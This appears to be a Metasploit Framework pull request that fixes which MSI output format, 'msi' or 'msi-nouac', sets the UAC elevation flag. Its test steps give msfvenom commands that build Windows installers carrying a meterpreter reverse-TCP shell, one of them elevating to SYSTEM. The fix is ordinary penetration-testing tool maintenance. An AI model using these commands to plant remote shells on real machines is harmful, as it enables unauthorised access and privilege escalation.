### PR TITLE
Fix no-uac msi creation

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -2144,6 +2144,7 @@ require 'msf/core/exe/segment_appender'
         when ARCH_X64
           exe = to_win64pe(framework, code, exeopts)
       end
+      exeopts[:uac] = true
       Msf::Util::EXE.to_exe_msi(framework, exe, exeopts)
     when 'msi-nouac'
       case arch
@@ -2152,7 +2153,6 @@ require 'msf/core/exe/segment_appender'
       when ARCH_X64
         exe = to_win64pe(framework, code, exeopts)
       end
-      exeopts[:uac] = true
       Msf::Util::EXE.to_exe_msi(framework, exe, exeopts)
     when 'elf'
       if elf? code


### PR DESCRIPTION
Resolves https://github.com/rapid7/metasploit-framework/issues/9799

Tests: 
--------------------

- [x] Create a UAC capable MSI:

```
msfvenom -p windows/meterpreter/reverse_tcp -f msi -o /tmp/uac.msi
```

- [x] Run as a non elevated account
- [x] should get a UAC prompt
- [x] If executed should run as SYSTEM.

--------------------



- [x] Create a non UAC capable MSI:

```
msfvenom -p windows/meterpreter/reverse_tcp -f msi-nouac -o /tmp/nouac.msi
```

- [x] Run as a non elevated account
- [x] No UAC prompt
- [x] Should run as the user